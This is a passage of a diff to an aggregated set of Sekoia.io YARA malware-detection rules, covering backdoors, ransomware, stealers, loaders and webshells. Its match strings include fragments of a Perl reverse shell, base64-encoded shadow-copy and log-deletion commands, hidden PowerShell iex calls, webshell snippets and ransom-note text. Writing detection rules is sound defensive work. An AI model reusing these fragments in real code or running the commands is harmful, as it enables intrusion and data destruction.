+		$ = "run_command"
+		$ = "sendFile"
+		$ = "sendMessage"
+		$ = "send_brw_data"
+		$ = "updateMessageID"
+		$ = "update_new_token"
+		$ = "update_new_xml"
+		$ = {53 00 74 00 61 00 72 00 74 00 65 00 64 00 20 00 75 00 70 00 20 00 72 00 75 00 6e}
+		$ = {20 00 72 00 65 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
+		$ = {6e 00 65 00 77 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 21}
+		$ = {74 00 6f 00 6b 00 65 00 6e 00 20 00 75 00 70 00 64 00 61 00 74 00 65 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 21 00 21 00 21}
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and filesize < 1MB and all of them
+		6 of them
 }
-rule SEKOIA_Unk_Quad7_Fsynet_Strings : FILE
+rule SEKOIA_Backdoor_Blueshell : FILE
 {
 	meta:
-		description = "Matches node-r-control, asr_node, node-relay"
+		description = "Detects BlueShell backdoor"
 		author = "Sekoia.io"
-		id = "897b2421-c177-48c0-8f5b-82d8434208cb"
-		date = "2024-08-20"
+		id = "8f1cd966-c4d8-44f9-8cd5-4f5277332546"
+		date = "2023-09-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unk_quad7_fsynet_strings.yar#L1-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_blueshell.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "f42849076e24b7827218f7a25bc11ccc"
-		hash = "b3b09819f820a4ecd31f82f369000af2"
-		hash = "92093dd7ba6ae8fe34a215c4c4bd1cd4"
-		hash = "e6f6a6de285d7c2361c32b1f29a6c3f6"
-		hash = "408152285671bbd0e6e63bd71d6abaaf"
-		hash = "5efc7d824851be9ec90a97d889a40d23"
-		logic_hash = "960119a025dedae7c5dfdf872cd515e2b6cf2999179ba84374d547047316caa2"
+		logic_hash = "348ae383f2aaef544951641dd7e2879afa23e37bdf429c6255254115bd3e10d5"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "prev_hop_port"
-		$ = "next_hop_port"
-		$ = "back_hop_port"
-		$ = "next_tsn_port"
-		$ = "prev_hop_ip"
-		$ = "next_hop_ip"
-		$ = "back_hop_ip"
-		$ = "next_tsn_ip"
-		$ = "ikcp_"
-		$ = "/tmp/log_r"
-		$ = "total_hop"
+	strings:
+		$s1 = "BlueShell" ascii
+		$s2 = "client.go" ascii
+		$s3 = "server ip" ascii
+		$s4 = "server port" ascii
+		$s5 = "reconnect wait time" ascii
+		$s6 = "shell" ascii
+		$s7 = "socks" ascii
+		$s8 = "socks5" ascii
+		$s9 = "GetInteractiveShell" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 6 of them
+		filesize < 11MB and all of them
 }
-rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Loader : FILE
+rule SEKOIA_Ransomware_Win_Redeemer : FILE
 {
 	meta:
-		description = "Detects VHD ransomware x64 loader "
+		description = "Finds Redeemer samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "377f3ec5-fa2a-431e-93d2-6a1eb9e01d28"
-		date = "2022-11-28"
+		id = "ef94c1b0-d292-4fae-9801-4860e7347745"
+		date = "2022-12-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_lazarus_vhd_ransomware_loader.yar#L1-L30"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_redeemer.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "33000fd79b5aae59dcbf445bb4d0d65cf5f939f376a4e3d9e23e14b11ca297da"
+		logic_hash = "c1798a18e763277d19a3b698459244a2bc2eeebbbf239db7540d1493955ce5f0"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238656,36 +238619,32 @@ rule SEKOIA_Apt_Lazarus_Vhd_Ransomware_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = { B8 64 [8] B8 75 [8] B8 6D [8] B8 70 [8] B8 2E [8] B8 62 [8] B8 69 [8] B8 6E }
-		$ = { 48 63 ?? ?? ??
-        48 8B ?? ?? ??
-        0F BE ?? ??
-        B9 ?? ?? ?? ??
-        48 6B ?? ??
-        48 8B ?? ?? ??
-        0F BE ?? ??
-        ?? ??
-        48 63 ?? ?? ??
-        48 8B ?? ?? ??
-        88 ?? ??
-        EB }
-		$ = { 25 00 73 00 5c [3-15] 25 00 64 00 25 00 64 00 2e 00 62 00 69 00 6e }
+		$str0 = "RedeemerMutex" ascii
+		$str1 = "SOFTWARE\\Redeemer" ascii
+		$str2 = "-----BEGIN REDEEMER PUBLIC KEY-----" ascii
+		$str3 = "dnNzYWRtaW4gZGVsZXRlIHNoYWRvd3MgL0FsbCAvUXVpZXQ=" ascii
+		$str4 = "d2V2dHV0aWwgY2xlYXItbG9nIEFwcGxpY2F0aW9u" ascii
+		$str5 = "d2JhZG1pbiBkZWxldGUgc3lzdGVtc3RhdGViYWNrdXAgLWRlbGV0ZW9sZGVzdCAtcXVpZXQ=" ascii
+		$str6 = "YXNzb2MgLnJlZGVlbT1yZWRlZW1lcg==" ascii
+		$str7 = "UmVkZWVtZXIgUmFuc29td2FyZSAtIFlvdXIgRGF0YSBJcyBFbmNyeXB0ZWQ=" ascii
+		$str8 = "redeemer\\DefaultIcon" wide
+		$str9 = "\\Redeemer.sys" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 2 of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SEKOIA_Infostealer_Win_Blustealer : FILE
+rule SEKOIA_Bot_Lin_Kinsing_Strings : FILE
 {
 	meta:
-		description = "Detect the BluStealer infostealer based on characteristic strings"
+		description = "Catch Kinsing malware based on strings"
 		author = "Sekoia.io"
-		id = "a56b3c12-9d83-4a0b-81e8-43332e64d599"
-		date = "2022-10-05"
+		id = "ce41b6d0-bc22-4a85-a3bb-ed3234871524"
+		date = "2023-11-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_blustealer.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/bot_lin_kinsing_strings.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fc7c11a9ddd21228aa773da6054220211327727a87d48008b7edb202c48666d8"
+		logic_hash = "164b22734541d43047a2ea868cf0a269efe69c64a6392030168f4d391b1be777"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238693,37 +238652,42 @@ rule SEKOIA_Infostealer_Win_Blustealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cha01 = "@top\\LOGGERS\\DARKCLOUD" wide
-		$cha02 = "===============DARKCLOUD===============" wide
-		$cha03 = "#######################################DARKCLOUD#######################################" wide
-		$cha04 = "fireballsabadafirebricksfisherboat" ascii
-		$cha05 = "Moonchild Pro2ductions" wide
-		$str01 = "\\Microsoft\\Windows\\Templates\\credentials.txt" wide
-		$str02 = "\\NETGATE Technologies\\BlackHawK\\Profiles" wide
-		$str03 = "SysWOW64\\winsqlite3.dll" wide
-		$str04 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
-		$str05 = "Expiry Date;" wide
-		$str06 = "SELECT c0subject, c3author, c4recipients, c1body  FROM messagesText_content" wide
-		$str07 = "http://www.mediacollege.com/internet/utilities/show-ip.shtml" wide
-		$str08 = "\\163MailContacts.txt" wide
-		$key_0 = {ba ?? ?? 40 00 8d 4?}
+		$s1 = "MinerUrl" ascii
+		$s2 = "main.masscan" ascii
+		$s3 = "redisBrute" ascii
+		$s4 = "ActiveC2CUrl" ascii
+		$s5 = "main.getKi" ascii
+		$s6 = "main.getMu" ascii
+		$s7 = "tryToRunMiner" ascii
+		$s8 = "main.kiLoader" ascii
+		$s9 = "main.downloadAndExecute" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $cha* ) and 4 of ( $str* ) and $key_0
+		uint32( 0 ) == 0x464c457f and all of them
 }
-
-rule SEKOIA_Yara_Runascs : FILE
+rule SEKOIA_Rat_Darkvision_String : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "DarkVision RAT based on string"
 		author = "Sekoia.io"
-		id = "1720f042-2cc6-4ef1-b66c-fe8a4214366a"
-		date = "2023-08-23"
+		id = "ab698a79-42ee-452a-a3ba-1a9872d5e2bc"
+		date = "2024-09-17"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/yara_runascs.yar#L3-L33"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_darkvision_string.yar#L1-L28"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fe9b02704d07b5ebe6ad94283e4c1ec2846a54f5c1fb2115a1f6411cf8c19059"
+		hash = "8ec5526cecc596e0711c82e39cd4f2ce"
+		hash = "2dd476464e46d91ffe68483cb478d9b4"
+		hash = "20de7547d79d3637430b6a0787e59df5"
+		hash = "60d1e02316e6f22e078f9aa710790912"
+		hash = "e136e51efc22b0e071c11e7d652ea3be"
+		hash = "f466be81310147fcdd9a7886735a3786"
+		hash = "5065134cf4ba765bd97bb2edb61c5869"
+		hash = "6ed21c4f507e8cc830141ff732bd5acc"
+		hash = "40b2641150f291ca07bd08ab629fe1ed"
+		hash = "3f20cd14137e0abfa84b39e29a277350"
+		hash = "7dc8427be8b4d26a49fd380ad40d3b96"
+		logic_hash = "63ed3b1a991dc07bd06678a58449e0a67dd9453b358c0ac82a9c38235394122b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238731,109 +238695,74 @@ rule SEKOIA_Yara_Runascs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RunasCs" ascii wide
-		$s2 = "LOGON32_LOGON_INTERACTIVE" ascii wide
-		$s3 = "LOGON32_LOGON_NETWORK" ascii wide
-		$s4 = "LOGON32_LOGON_BATCH" ascii wide
-		$s5 = "LOGON32_LOGON_SERVICE" ascii wide
-		$s6 = "dwLogonProvider" ascii wide
-		$s7 = "LogonUser" ascii wide
-		$s8 = "CreateProcessAsUser" ascii wide
+		$ = "DarkVision Installation" wide
+		$ = "You are about to install DarkVision Remote Access Tool." wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them and not ( pe.version_info [ "OriginalFilename" ] == "Atera.AgentPackages.CommonLib.dll" and for any sig in pe.signatures : ( sig.subject contains "CN=Atera Networks Ltd" and sig.issuer contains "CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" ) )
+		uint16be( 0 ) == 0x4d5a and 2 of them
 }
-
-rule SEKOIA_Ransomware_Win_Blackmatter
+rule SEKOIA_Luckymouse_Sysupdate_Payload : FILE
 {
 	meta:
-		description = "Detect Black matter ransomware (2021-07-23)"
+		description = "Detects decryption routine prologue of sysupdate samples"
 		author = "Sekoia.io"
-		id = "9b2d8ac3-b4d1-40f5-ac57-411547dcb2cf"
-		date = "2021-08-03"
+		id = "97df4700-de35-49a0-869e-ed89a6d9cbdd"
+		date = "2022-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_blackmatter.yar#L4-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/luckymouse_sysupdate_payload.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "5a407a9901314211e13bef30254f1d129cf3c731ea970abff8602f1ae40177cb"
+		logic_hash = "e8501a50c65330153e613ae5bd6bbfbe4372d85175c3ed81d202ec5f177a94be"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = { DB ?? ?? C9 66 B9 ?? ?? E8 FF FF FF FF }
+
 	condition:
-		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5e89d335de2021a2c268acf00ec513e5" )
+		filesize < 1MB and all of them
 }
-rule SEKOIA_Ransomware_Win_Wing : FILE
+rule SEKOIA_Apt_Spikedwine_Malicious_Hta
 {
 	meta:
-		description = "Finds Wing ransomware samples based on specific strings"
+		description = "Detects malicious HTA used by SPIKEDWINE"
 		author = "Sekoia.io"
-		id = "c2fe8321-8013-4aa4-91a6-c0face3e6b52"
-		date = "2024-01-30"
+		id = "e4526142-d98a-bf35-9d2c-ca2e83638c4b"
+		date = "2024-02-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_wing.yar#L1-L52"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_spikedwine_malicious_hta.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c9f373c12f4fb5efc29d0f293a2e0b46cf03c1abe124e9dd4118bef6c6e3f731"
+		logic_hash = "305896cde5d95c29de511541a961063730709d40d67a8788f084c17f181e3baf"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$fun01 = "LockBIT" ascii fullword
-		$fun02 = "BigEncrypt" ascii
-		$fun03 = "RunEncrypt" ascii
-		$fun04 = "AesEncrypt" ascii
-		$fun05 = "KeyGenerator" ascii
-		$fun06 = "GetUniqueKey" ascii
-		$fun07 = "SearchFolder" ascii
-		$fun08 = "ThreadFolders" ascii
-		$fun09 = "ContainsKeyword" ascii
-		$fun10 = "ReadMeMaker" ascii
-		$fun11 = "StopAndConfigureSqlServices" ascii
-		$fun12 = "WipeRecycleBin" ascii
-		$fun13 = "TelSender" ascii
-		$str01 = "AnyDesk" wide
-		$str02 = "firebird" wide
-		$str03 = "Acronis" wide
-		$str04 = "config \"" wide
-		$str05 = " start= demand" wide
-		$str06 = "' stopped and configured to start automatically." wide
-		$str07 = "Error processing service '" wide
-		$str08 = "$RECYCLE.BIN" wide
-		$str09 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
-		$str10 = "UniqueID:" wide
-		$str11 = "PersonalID:" wide
-		$ran01 = "C:\\Readme.txt" wide
-		$ran02 = "C:\\LockBIT\\systemID" wide
-		$ran03 = "Your system has been encrypted by our team, and your files have been locked using our proprietary algorithm !" wide
-		$ran04 = "* Please read this message carefully and patiently *" wide
-		$ran05 = "* If you use any tools, programs, or methods to recover your files and they get damaged, we will not be responsible for any harm to your files !" wide
-		$ran06 = "* Note that your files have not been harmed in any way they have only been encrypted by our algorithm." wide
-		$ran07 = "Your files and your entire system will return to normal mode through the program we provide to you. No one but us will be able to decrypt your files !" wide
-		$ran08 = "* To gain trust in us, you can send us a maximum of 2 non-important files, and we will decrypt them for you free of charge." wide
-		$ran09 = "Please put your Unique ID as the title of the email or as the starting title of the conversation." wide
-		$ran10 = "* For faster decryption, first message us on Telegram. If there is no response within 24 hours, please email us *" wide
+		$ = "<HTA:APPLICATION ID=" nocase
+		$ = "return _0x"
+		$ = "font-size: 18px;"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 5 of ( $fun* ) and 5 of ( $str* ) and 2 of ( $ran* ) ) or 12 of ( $fun* ) or 10 of ( $ran* ) or 8 of ( $ran* ) )
+		all of them
 }
-rule SEKOIA_Koiloader_Lnk : FILE
+rule SEKOIA_Generic_Perl_Reverse_Shell : FILE
 {
 	meta:
-		description = "LNK file leading to deploy KoiLoader"
+		description = "Detects simple reverse shell written in Perl"
 		author = "Sekoia.io"
-		id = "e82975b9-94b7-4de8-8cd5-d594aa80cf02"
-		date = "2024-03-20"
+		id = "4eb2ef0d-3ada-4566-bd82-8c75d6931acc"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koiloader_lnk.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_perl_reverse_shell.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "49953c76796f671ed80afa21872aac500d706f2af4426a5ec2854e16b9d0e474"
+		logic_hash = "d0a23db712746bac4684d6b4508dd891caf06d72af153b1a0ab489a93edbfaf4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238841,26 +238770,25 @@ rule SEKOIA_Koiloader_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "bat & schtasks /create" wide
-		$s2 = "/sc minute /mo 1" wide
-		$s3 = "c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgLVVzZUJhc2ljUGFyc2luZyAnaHR0cHM6" wide
-		$s4 = " & certutil -f -decode " wide
+		$ = "open(STDIN,\">&S\");"
+		$ = "open(STDERR,\">&S\");"
+		$ = "use Socket;$i="
 
 	condition:
-		uint32( 0 ) == 0x0000004c and all of them
+		filesize < 300 and all of them
 }
-rule SEKOIA_Guloader_Powershell_1 : FILE
+rule SEKOIA_Infostealer_Win_Acrstealer_Str : FILE
 {
 	meta:
-		description = "Powershell downloading decoy and delivering GuLoader"
+		description = "Finds ACR Stealer standalone samples based on specific strings."
 		author = "Sekoia.io"
-		id = "28c68991-db8b-4f00-b3a3-17286418a4ed"
-		date = "2024-02-07"
+		id = "63b4d6ff-0cab-44ec-9d53-bb2612371a48"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_powershell_1.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_acrstealer_str.yar#L1-L29"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9fd2d0e31f939e7e96444eaa4802c9c33407c5fb77067670d8ce2d3796199961"
+		logic_hash = "53d313857577b39b51a3e396c078d39a8b8ab803295b689357c3e8ea94cac9f7"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238868,31 +238796,37 @@ rule SEKOIA_Guloader_Powershell_1 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "powershell -win hidden"
-		$s2 = "=iex($"
-		$s3 = ".Replace('"
-		$s4 = "$(Get-ChildItem -Include *.lnk -Name));"
+		$str01 = "ref.txt" ascii
+		$str02 = "Wininet.dll" ascii
+		$str03 = "Content-Type: application/octet-stream; boundary=----" ascii
+		$str04 = "POST" ascii
+		$str05 = "os_c" ascii fullword
+		$str06 = "en_k" ascii fullword
+		$str07 = "MyApp/1.0" ascii
+		$str08 = "/Up/b" ascii
+		$str09 = "Hello, World!" ascii
+		$str10 = "/ujs/" ascii
+		$str11 = "/Up/" ascii fullword
+		$str12 = "ostr" ascii fullword
+		$str13 = "brCH" ascii fullword
+		$str14 = "brGk" ascii fullword
+		$str15 = "https://steamcommunity.com/profiles/" ascii
 
 	condition:
-		all of them and filesize < 10KB and #s3 > 3
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Tool_Bypassgodzilla : FILE
+rule SEKOIA_Apt_Nobelium_Acrobox_Downloader_Apr2022 : FILE
 {
 	meta:
-		description = "Detects payload of BypassGodzilla"
+		description = "Detects AcroBox downloader"
 		author = "Sekoia.io"
-		id = "fa492f97-a46c-422d-a617-c503744ee22e"
-		date = "2024-09-09"
+		id = "77f7f01d-72a2-4b13-b23f-d938a415dd40"
+		date = "2022-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_bypassgodzilla.yar#L1-L38"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_nobelium_acrobox_downloader_apr2022.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "571c9042c627abba19ba1d591e2083eb"
-		hash = "56cfc5a876f8f55bf184be9f368b6d8a"
-		hash = "d4f7ca537701aee8849c474bc4df19d1"
-		hash = "e4be04331c5f447b3ca03aa637d16c85"
-		hash = "905fa3b692577a086ac654ef89e8b83d"
-		logic_hash = "47e52267c73209c6191910ac21bca44acac2100be96250fd5dda1f889fb03b07"
+		logic_hash = "ebcbdf13908971eea3e5b291719527e2e454a9ee3b98b5dc66149b2bb3b8fe67"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238900,34 +238834,30 @@ rule SEKOIA_Tool_Bypassgodzilla : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$jsp_1a = "response.getWriter().write(\""
-		$jsp_1b = "\".substring("
-		$jsp_2a = "response.getWriter().write(java.util.Base64/*"
-		$jsp_2b = "*/.getEncoder()/*"
-		$jsp_2c = ".toByteArray(),true)));"
-		$asp_1 = "[\"payload\"]).CreateInstance(\"LY\");"
-		$asp_2 = "\\U00000045\\U00000071\\U00000075\\U00000061\\U0000006C\\U00000073(Context);"
-		$php_1 = "=(\"!\"^\"@\").'ss'.Chr(\"101\").'rs';"
-		$php_2 = "*/md5/*"
-		$php_3 = "*/isset($_SESSION/*"
-		$php_4 = "@set_time_limit(Chr(\"48\"))"
+		$s1 = { 80 ?? 7B
+        0F 84 ?? ?? 00 00
+        80 ?? ?? 0F
+        0F 84 ?? ?? 00 00
+        80 ?? ?? 0F
+        0F 84 ?? ?? 00 00
+        80 ?? ?? 0F
+        0F 84 ?? ?? 00 00 }
 
 	condition:
-		(( all of ( $jsp_* ) and ( @jsp_1b- @jsp_1a < 70 ) and ( @jsp_2b- @jsp_2a < 70 ) and ( @jsp_2c - @jsp_2a < 160 ) ) or ( all of ( $asp_* ) and ( @asp_2 > @asp_1 ) ) or ( all of ( $php_* ) ) ) and filesize < 30KB and true
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $s* )
 }
-rule SEKOIA_Tool_Advancedrun_Strings : FILE
+rule SEKOIA_Koi_Koiloader : FILE
 {
 	meta:
-		description = "Detects AdvancedRun strings"
+		description = "Detects Koi Loader"
 		author = "Sekoia.io"
-		id = "842a996e-0cf2-485f-9d3c-ccbd40c9ab6c"
-		date = "2024-09-06"
+		id = "b8289d78-42de-4919-b2c5-3c926ddd8043"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_advancedrun_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koi_koiloader.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "a1d50ebe6124584f32de0625475cdb74"
-		logic_hash = "58e5e0c903057ff382a78a37ba289cbaa5949d99a4b5ff77a223e86aab591f5d"
+		logic_hash = "7b4f12b0dec3927a46db1c8b2163e54a0a515d2b7360ba94647097fecf3d4653"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -238935,54 +238865,58 @@ rule SEKOIA_Tool_Advancedrun_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "nirsoft.net" wide
-		$ = "Another logged-in user" wide
-		$ = "Choose config file to save" wide
-		$ = "AdvancedRun" ascii wide
+		$s2 = "%d|%s|%.16s|" ascii wide
+		$s3 = "Release" ascii wide
+		$s4 = "%s|%d.%d (%d)|%S|%S|%S" ascii wide
+		$s5 = "InitiateSystemShutdownExW" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and filesize < 11MB and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Tinynote : FILE
+
+rule SEKOIA_Loader_Win_Stealthvector : FILE
 {
 	meta:
-		description = "Detects strings in TinyNote backdoor"
+		description = "Detect the StealthVector malware, updated in July 2024"
 		author = "Sekoia.io"
-		id = "a2b9bea4-a211-456f-8a3f-0f31733e8b29"
-		date = "2023-06-07"
+		id = "ecf6421a-f492-43c4-9ed7-eb4724d24779"
+		date = "2021-08-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_tinynote.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_stealthvector.yar#L4-L32"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "20723b449d057ddf09fa34aa7511275939f98c6c84593af64d99f980c679b2c1"
+		logic_hash = "71ea017462bbb1891ef306d1e56dece5864885f5c8db5c50431ab085d37bda03"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-07-15"
 		classification = "TLP:CLEAR"
+		hash1 = "166b6dcdac31f4bf51e4b20a7c3f7d4f7017ca0c30fa123d5591e25c3fa66107"
+		hash2 = "ab56501167fe689fe55f6e6ddc3bb91952299bd5c3ef004b02bf1c3b4061c7cf"
+		hash3 = "0faddbe1713455e3fc9777ec45adf07b28e24f4c3ddca37586c2aa6b539898c0"
+		hash4 = "1c88150ec85a07c3db5f18c5eedcb0b653467b897af01d690ed996e5e07ba8e3"
+		hash5 = "ec10a9396dca694fe64366e0dab82d046cf92457f97efd50a68ceb85adef6b74"
 
 	strings:
-		$s1 = "bypassSMADAV" ascii fullword
-		$s2 = "excuteCmdLine" ascii fullword
-		$s3 = "/Create1953125" ascii
-		$s4 = "MINUTEMonday" ascii
-		$s5 = "WndProc" ascii
+		$s1 = "Global\\kREwdFrOlvASgP4zWZyV89m6T2K0bIno" ascii
+		$s2 = "Global\\v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
+		uint16( 0 ) == 0x5A4D and 1 of them or pe.imphash ( ) == "0cd7b92b97ccc7e255df1f46b5299986" or pe.imphash ( ) == "be777e91e3c42ac62471cfb7239be471" or hash.md5 ( pe.rich_signature.clear_data ) == "fcc67611d136cce0e785029bbb879b45"
 }
-rule SEKOIA_Rat_Win_Babylon : FILE
+rule SEKOIA_Tool_Bore_Rust_Any_Platform : FILE
 {
 	meta:
-		description = "Finds Babylon RAT samples based on specific strings"
+		description = "Detects bore tunneling tool"
 		author = "Sekoia.io"
-		id = "ba9ab80a-ad7e-4746-aff2-9328440cbb25"
-		date = "2023-08-22"
+		id = "c0ec0d72-de8e-4b96-9db6-a7a4e2f693f1"
+		date = "2023-07-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_babylon.yar#L1-L27"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_bore_rust_any_platform.yar#L1-L28"
